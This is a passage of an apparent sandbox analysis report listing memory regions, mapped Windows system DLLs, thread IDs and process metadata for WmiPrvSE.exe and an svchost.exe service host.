filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")
Region:
id = 1644
start_va = 0x7ffb3d310000
end_va = 0x7ffb3d4d1fff
entry_point = 0x7ffb3d310000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1645
start_va = 0x129f6c0000
end_va = 0x129f6cffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000129f6c0000"
filename = ""
Region:
id = 1646
start_va = 0x129f800000
end_va = 0x129f8fffff
entry_point = 0x0
region_type = private
name = "private_0x000000129f800000"
filename = ""
Region:
id = 1647
start_va = 0x129f900000
end_va = 0x129f9bdfff
entry_point = 0x129f900000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1648
start_va = 0x7ff7b96b0000
end_va = 0x7ff7b97affff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff7b96b0000"
filename = ""
Region:
id = 1649
start_va = 0x7ffb3a800000
end_va = 0x7ffb3a9dcfff
entry_point = 0x7ffb3a800000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1650
start_va = 0x7ffb3d260000
end_va = 0x7ffb3d30cfff
entry_point = 0x7ffb3d260000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1651
start_va = 0x129f6d0000
end_va = 0x129f6d6fff
entry_point = 0x0
region_type = private
name = "private_0x000000129f6d0000"
filename = ""
Region:
id = 1652
start_va = 0x129f7b0000
end_va = 0x129f7b6fff
entry_point = 0x0
region_type = private
name = "private_0x000000129f7b0000"
filename = ""
Region:
id = 1653
start_va = 0x129f7c0000
end_va = 0x129f7c0fff
entry_point = 0x0
region_type = private
name = "private_0x000000129f7c0000"
filename = ""
Region:
id = 1654
start_va = 0x129f7d0000
end_va = 0x129f7d0fff
entry_point = 0x0
region_type = private
name = "private_0x000000129f7d0000"
filename = ""
Region:
id = 1655
start_va = 0x129f7e0000
end_va = 0x129f7e4fff
entry_point = 0x129f7e0000
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")
Region:
id = 1656
start_va = 0x129f7f0000
end_va = 0x129f7f0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000129f7f0000"
filename = ""
Region:
id = 1657
start_va = 0x129f9c0000
end_va = 0x129fa3ffff
entry_point = 0x0
region_type = private
name = "private_0x000000129f9c0000"
filename = ""
Region:
id = 1658
start_va = 0x129fa40000
end_va = 0x129fbc7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000129fa40000"
filename = ""
Region:
id = 1659
start_va = 0x129fbd0000
end_va = 0x129fbd0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000129fbd0000"
filename = ""
Region:
id = 1660
start_va = 0x129fbe0000
end_va = 0x129fbeffff
entry_point = 0x0
region_type = private
name = "private_0x000000129fbe0000"
filename = ""
Region:
id = 1661
start_va = 0x129fbf0000
end_va = 0x129ff26fff
entry_point = 0x129fbf0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1662
start_va = 0x129ff30000
end_va = 0x12a00b0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000129ff30000"
filename = ""
Region:
id = 1663
start_va = 0x12a00c0000
end_va = 0x12a017ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000012a00c0000"
filename = ""
Region:
id = 1664
start_va = 0x12a0180000
end_va = 0x12a01fffff
entry_point = 0x0
region_type = private
name = "private_0x00000012a0180000"
filename = ""
Region:
id = 1665
start_va = 0x12a0200000
end_va = 0x12a02fffff
entry_point = 0x0
region_type = private
name = "private_0x00000012a0200000"
filename = ""
Region:
id = 1666
start_va = 0x12a0300000
end_va = 0x12a0300fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000012a0300000"
filename = ""
Region:
id = 1667
start_va = 0x12a0310000
end_va = 0x12a038ffff
entry_point = 0x0
region_type = private
name = "private_0x00000012a0310000"
filename = ""
Region:
id = 1668
start_va = 0x12a0390000
end_va = 0x12a040ffff
entry_point = 0x0
region_type = private
name = "private_0x00000012a0390000"
filename = ""
Region:
id = 1669
start_va = 0x12a0410000
end_va = 0x12a048ffff
entry_point = 0x0
region_type = private
name = "private_0x00000012a0410000"
filename = ""
Region:
id = 1670
start_va = 0x12a0490000
end_va = 0x12a050ffff
entry_point = 0x0
region_type = private
name = "private_0x00000012a0490000"
filename = ""
Region:
id = 1671
start_va = 0x12a0510000
end_va = 0x12a058ffff
entry_point = 0x0
region_type = private
name = "private_0x00000012a0510000"
filename = ""
Region:
id = 1672
start_va = 0x12a0590000
end_va = 0x12a060ffff
entry_point = 0x0
region_type = private
name = "private_0x00000012a0590000"
filename = ""
Region:
id = 1673
start_va = 0x7ff7b96a8000
end_va = 0x7ff7b96a9fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7b96a8000"
filename = ""
Region:
id = 1674
start_va = 0x7ff7b96aa000
end_va = 0x7ff7b96abfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7b96aa000"
filename = ""
Region:
id = 1675
start_va = 0x7ff7b96ac000
end_va = 0x7ff7b96adfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7b96ac000"
filename = ""
Region:
id = 1676
start_va = 0x7ff7b96ae000
end_va = 0x7ff7b96affff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7b96ae000"
filename = ""
Region:
id = 1677
start_va = 0x7ff7b97d4000
end_va = 0x7ff7b97d5fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7b97d4000"
filename = ""
Region:
id = 1678
start_va = 0x7ff7b97d6000
end_va = 0x7ff7b97d7fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7b97d6000"
filename = ""
Region:
id = 1679
start_va = 0x7ff7b97d8000
end_va = 0x7ff7b97d9fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7b97d8000"
filename = ""
Region:
id = 1680
start_va = 0x7ff7b97da000
end_va = 0x7ff7b97dbfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff7b97da000"
filename = ""
Region:
id = 1681
start_va = 0x7ffb2d450000
end_va = 0x7ffb2d465fff
entry_point = 0x7ffb2d450000
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 1682
start_va = 0x7ffb2d700000
end_va = 0x7ffb2d724fff
entry_point = 0x7ffb2d700000
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 1683
start_va = 0x7ffb2d730000
end_va = 0x7ffb2d743fff
entry_point = 0x7ffb2d730000
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 1684
start_va = 0x7ffb2d750000
end_va = 0x7ffb2d847fff
entry_point = 0x7ffb2d750000
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 1685
start_va = 0x7ffb2e4a0000
end_va = 0x7ffb2e4b0fff
entry_point = 0x7ffb2e4a0000
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 1686
start_va = 0x7ffb33330000
end_va = 0x7ffb333aefff
entry_point = 0x7ffb33330000
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 1687
start_va = 0x7ffb35d90000
end_va = 0x7ffb35dccfff
entry_point = 0x7ffb35d90000
region_type = mapped_file
name = "wmiprov.dll"
filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll")
Region:
id = 1688
start_va = 0x7ffb39080000
end_va = 0x7ffb390b1fff
entry_point = 0x7ffb39080000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1689
start_va = 0x7ffb39260000
end_va = 0x7ffb39292fff
entry_point = 0x7ffb39260000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1690
start_va = 0x7ffb39610000
end_va = 0x7ffb39626fff
entry_point = 0x7ffb39610000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1691
start_va = 0x7ffb39780000
end_va = 0x7ffb3978afff
entry_point = 0x7ffb39780000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1692
start_va = 0x7ffb39b60000
end_va = 0x7ffb39b87fff
entry_point = 0x7ffb39b60000
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1693
start_va = 0x7ffb39b90000
end_va = 0x7ffb39bfafff
entry_point = 0x7ffb39b90000
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 1694
start_va = 0x7ffb39d60000
end_va = 0x7ffb39d6efff
entry_point = 0x7ffb39d60000
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 1695
start_va = 0x7ffb3a9e0000
end_va = 0x7ffb3a9e7fff
entry_point = 0x7ffb3a9e0000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1696
start_va = 0x7ffb3bf80000
end_va = 0x7ffb3c0a5fff
entry_point = 0x7ffb3bf80000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1697
start_va = 0x7ffb3c2d0000
end_va = 0x7ffb3c375fff
entry_point = 0x7ffb3c2d0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1698
start_va = 0x7ffb3c3e0000
end_va = 0x7ffb3c564fff
entry_point = 0x7ffb3c3e0000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1699
start_va = 0x7ffb3c570000
end_va = 0x7ffb3c5d8fff
entry_point = 0x7ffb3c570000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1700
start_va = 0x7ffb3c650000
end_va = 0x7ffb3c79dfff
entry_point = 0x7ffb3c650000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1701
start_va = 0x7ffb3c950000
end_va = 0x7ffb3c9aafff
entry_point = 0x7ffb3c950000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1702
start_va = 0x7ffb3c9b0000
end_va = 0x7ffb3ca6dfff
entry_point = 0x7ffb3c9b0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1703
start_va = 0x7ffb3ca70000
end_va = 0x7ffb3cb14fff
entry_point = 0x7ffb3ca70000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1704
start_va = 0x7ffb3cc70000
end_va = 0x7ffb3ceebfff
entry_point = 0x7ffb3cc70000
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 1705
start_va = 0x7ffb3cf10000
end_va = 0x7ffb3cfacfff
entry_point = 0x7ffb3cf10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Thread:
id = 176
os_tid = 0x27c
Thread:
id = 177
os_tid = 0x388
Thread:
id = 178
os_tid = 0x2a4
Thread:
id = 179
os_tid = 0x634
Thread:
id = 180
os_tid = 0x6ec
Thread:
id = 181
os_tid = 0x30c
Thread:
id = 182
os_tid = 0x598
Thread:
id = 183
os_tid = 0x908
Thread:
id = 184
os_tid = 0x234
Thread:
id = 230
os_tid = 0xe0c
Thread:
id = 231
os_tid = 0x250
Thread:
id = 232
os_tid = 0xa68
Process:
id = "12"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x55d9d000"
os_pid = "0x334"
os_integrity_level = "0x4000"
os_privileges = "0x60800000"
monitor_reason = "rpc_server"
parent_id = "2"
os_parent_pid = "0x32c"
cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\Local Service"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d801" [0xc000000f], "LOCAL" [0x7]
Region:
id = 1706
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1707
start_va = 0x5bf71f0000
end_va = 0x5bf71fffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000005bf71f0000"
filename = ""
Region:
id = 1708
start_va = 0x5bf7200000
end_va = 0x5bf7200fff
entry_point = 0x5bf7200000
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 1709
start_va = 0x5bf7210000
end_va = 0x5bf7223fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000005bf7210000"
filename = ""
Region:
id = 1710
start_va = 0x5bf7230000
end_va = 0x5bf72affff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf7230000"
filename = ""
Region:
id = 1711
start_va = 0x5bf72b0000
end_va = 0x5bf72b3fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000005bf72b0000"
filename = ""
Region:
id = 1712
start_va = 0x5bf72c0000
end_va = 0x5bf72c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000005bf72c0000"
filename = ""
Region:
id = 1713
start_va = 0x5bf72d0000
end_va = 0x5bf72d1fff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf72d0000"
filename = ""
Region:
id = 1714
start_va = 0x5bf72e0000
end_va = 0x5bf739dfff
entry_point = 0x5bf72e0000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1715
start_va = 0x5bf73a0000
end_va = 0x5bf73a0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000005bf73a0000"
filename = ""
Region:
id = 1716
start_va = 0x5bf73b0000
end_va = 0x5bf73b0fff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf73b0000"
filename = ""
Region:
id = 1717
start_va = 0x5bf7420000
end_va = 0x5bf7420fff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf7420000"
filename = ""
Region:
id = 1718
start_va = 0x5bf7430000
end_va = 0x5bf7430fff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf7430000"
filename = ""
Region:
id = 1719
start_va = 0x5bf7440000
end_va = 0x5bf74a4fff
entry_point = 0x5bf7440000
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 1720
start_va = 0x5bf74b0000
end_va = 0x5bf74b6fff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf74b0000"
filename = ""
Region:
id = 1721
start_va = 0x5bf74c0000
end_va = 0x5bf74dffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf74c0000"
filename = ""
Region:
id = 1722
start_va = 0x5bf74e0000
end_va = 0x5bf74fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf74e0000"
filename = ""
Region:
id = 1723
start_va = 0x5bf7500000
end_va = 0x5bf75fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf7500000"
filename = ""
Region:
id = 1724
start_va = 0x5bf7600000
end_va = 0x5bf7787fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000005bf7600000"
filename = ""
Region:
id = 1725
start_va = 0x5bf7790000
end_va = 0x5bf7794fff
entry_point = 0x5bf7790000
region_type = mapped_file
name = "pcaevts.dll"
filename = "\\Windows\\System32\\pcaevts.dll" (normalized: "c:\\windows\\system32\\pcaevts.dll")
Region:
id = 1726
start_va = 0x5bf77a0000
end_va = 0x5bf77bffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf77a0000"
filename = ""
Region:
id = 1727
start_va = 0x5bf77c0000
end_va = 0x5bf77c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000005bf77c0000"
filename = ""
Region:
id = 1728
start_va = 0x5bf77d0000
end_va = 0x5bf77d0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000005bf77d0000"
filename = ""
Region:
id = 1729
start_va = 0x5bf77e0000
end_va = 0x5bf77e0fff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf77e0000"
filename = ""
Region:
id = 1730
start_va = 0x5bf77f0000
end_va = 0x5bf77f6fff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf77f0000"
filename = ""
Region:
id = 1731
start_va = 0x5bf7800000
end_va = 0x5bf78fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf7800000"
filename = ""
Region:
id = 1732
start_va = 0x5bf7900000
end_va = 0x5bf7a80fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000005bf7900000"
filename = ""
Region:
id = 1733
start_va = 0x5bf7a90000
end_va = 0x5bf7b4ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000005bf7a90000"
filename = ""
Region:
id = 1734
start_va = 0x5bf7c50000
end_va = 0x5bf7ccffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf7c50000"
filename = ""
Region:
id = 1735
start_va = 0x5bf7cd0000
end_va = 0x5bf7cd0fff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf7cd0000"
filename = ""
Region:
id = 1736
start_va = 0x5bf7ce0000
end_va = 0x5bf7ce0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000005bf7ce0000"
filename = ""
Region:
id = 1737
start_va = 0x5bf7e50000
end_va = 0x5bf7f4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf7e50000"
filename = ""
Region:
id = 1738
start_va = 0x5bf7f50000
end_va = 0x5bf7fcffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf7f50000"
filename = ""
Region:
id = 1739
start_va = 0x5bf8030000
end_va = 0x5bf8036fff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf8030000"
filename = ""
Region:
id = 1740
start_va = 0x5bf8040000
end_va = 0x5bf80bffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf8040000"
filename = ""
Region:
id = 1741
start_va = 0x5bf8100000
end_va = 0x5bf81fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf8100000"
filename = ""
Region:
id = 1742
start_va = 0x5bf8200000
end_va = 0x5bf827ffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf8200000"
filename = ""
Region:
id = 1743
start_va = 0x5bf8280000
end_va = 0x5bf82fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf8280000"
filename = ""
Region:
id = 1744
start_va = 0x5bf8300000
end_va = 0x5bf83fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf8300000"
filename = ""
Region:
id = 1745
start_va = 0x5bf8400000
end_va = 0x5bf84fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf8400000"
filename = ""
Region:
id = 1746
start_va = 0x5bf8500000
end_va = 0x5bf85fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf8500000"
filename = ""
Region:
id = 1747
start_va = 0x5bf8600000
end_va = 0x5bf86fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf8600000"
filename = ""
Region:
id = 1748
start_va = 0x5bf8700000
end_va = 0x5bf8a36fff
entry_point = 0x5bf8700000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1749
start_va = 0x5bf8a40000
end_va = 0x5bf8abffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf8a40000"
filename = ""
Region:
id = 1750
start_va = 0x5bf8ac0000
end_va = 0x5bf8bbffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf8ac0000"
filename = ""
Region:
id = 1751
start_va = 0x5bf8d40000
end_va = 0x5bf8dbffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf8d40000"
filename = ""
Region:
id = 1752
start_va = 0x5bf8dc0000
end_va = 0x5bf8e3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf8dc0000"
filename = ""
Region:
id = 1753
start_va = 0x5bf8e40000
end_va = 0x5bf8ed2fff
entry_point = 0x5bf8e40000
region_type = mapped_file
name = "winlogon.exe"
filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe")
Region:
id = 1754
start_va = 0x5bf8f00000
end_va = 0x5bf8ffffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf8f00000"
filename = ""
Region:
id = 1755
start_va = 0x5bf9000000
end_va = 0x5bf906ffff
entry_point = 0x5bf9000000
region_type = mapped_file
name = "services.exe"
filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe")
Region:
id = 1756
start_va = 0x5bf9140000
end_va = 0x5bf923ffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf9140000"
filename = ""
Region:
id = 1757
start_va = 0x5bf9240000
end_va = 0x5bf933ffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf9240000"
filename = ""
Region:
id = 1758
start_va = 0x5bf9400000
end_va = 0x5bf94fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf9400000"
filename = ""
Region:
id = 1759
start_va = 0x5bf9500000
end_va = 0x5bf95fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf9500000"
filename = ""
Region:
id = 1760
start_va = 0x5bf9600000
end_va = 0x5bf96fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf9600000"
filename = ""
Region:
id = 1761
start_va = 0x5bf9700000
end_va = 0x5bf97fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf9700000"
filename = ""
Region:
id = 1762
start_va = 0x5bf9800000
end_va = 0x5bf98fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf9800000"
filename = ""
Region:
id = 1763
start_va = 0x5bf9900000
end_va = 0x5bf99fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf9900000"
filename = ""
Region:
id = 1764
start_va = 0x5bf9a00000
end_va = 0x5bf9afffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf9a00000"
filename = ""
Region:
id = 1765
start_va = 0x5bf9c00000
end_va = 0x5bf9cfffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf9c00000"
filename = ""
Region:
id = 1766
start_va = 0x5bf9d00000
end_va = 0x5bf9dfffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf9d00000"
filename = ""
Region:
id = 1767
start_va = 0x5bf9e00000
end_va = 0x5bf9efffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf9e00000"
filename = ""
Region:
id = 1768
start_va = 0x5bf9f00000
end_va = 0x5bf9ffffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bf9f00000"
filename = ""
Region:
id = 1769
start_va = 0x5bfa100000
end_va = 0x5bfa1fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bfa100000"
filename = ""
Region:
id = 1770
start_va = 0x5bfa200000
end_va = 0x5bfa2fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bfa200000"
filename = ""
Region:
id = 1771
start_va = 0x5bfa400000
end_va = 0x5bfa4fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bfa400000"
filename = ""
Region:
id = 1772
start_va = 0x5bfa500000
end_va = 0x5bfa5fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bfa500000"
filename = ""
Region:
id = 1773
start_va = 0x5bfa600000
end_va = 0x5bfa6fffff
entry_point = 0x0
region_type = private
name = "private_0x0000005bfa600000"
filename = ""
Region:
id = 1774
start_va = 0x7df5ffcf0000
end_va = 0x7ff5ffceffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffcf0000"
filename = ""
Region:
id = 1775
start_va = 0x7ff6c6fb8000
end_va = 0x7ff6c6fb9fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6fb8000"
filename = ""
Region:
id = 1776
start_va = 0x7ff6c6fba000
end_va = 0x7ff6c6fbbfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6fba000"
filename = ""
Region:
id = 1777
start_va = 0x7ff6c6fbe000
end_va = 0x7ff6c6fbffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6fbe000"
filename = ""
Region:
id = 1778
start_va = 0x7ff6c6fc0000
end_va = 0x7ff6c6fc1fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6fc0000"
filename = ""
Region:
id = 1779
start_va = 0x7ff6c6fc2000
end_va = 0x7ff6c6fc3fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6fc2000"
filename = ""
Region:
id = 1780
start_va = 0x7ff6c6fc4000
end_va = 0x7ff6c6fc5fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6fc4000"
filename = ""
Region:
id = 1781
start_va = 0x7ff6c6fc8000
end_va = 0x7ff6c6fc9fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6fc8000"
filename = ""
Region:
id = 1782
start_va = 0x7ff6c6fca000
end_va = 0x7ff6c6fcbfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6fca000"
filename = ""
Region:
id = 1783
start_va = 0x7ff6c6fcc000
end_va = 0x7ff6c6fcdfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6fcc000"
filename = ""
Region:
id = 1784
start_va = 0x7ff6c6fd0000
end_va = 0x7ff6c6fd1fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6fd0000"
filename = ""
Region:
id = 1785
start_va = 0x7ff6c6fd2000
end_va = 0x7ff6c6fd3fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6fd2000"
filename = ""
Region:
id = 1786
start_va = 0x7ff6c6fd4000
end_va = 0x7ff6c6fd5fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6fd4000"
filename = ""
Region:
id = 1787
start_va = 0x7ff6c6fd6000
end_va = 0x7ff6c6fd7fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6fd6000"
filename = ""
Region:
id = 1788
start_va = 0x7ff6c6fd8000
end_va = 0x7ff6c6fd9fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6fd8000"
filename = ""
Region:
id = 1789
start_va = 0x7ff6c6fda000
end_va = 0x7ff6c6fdbfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6c6fda000"
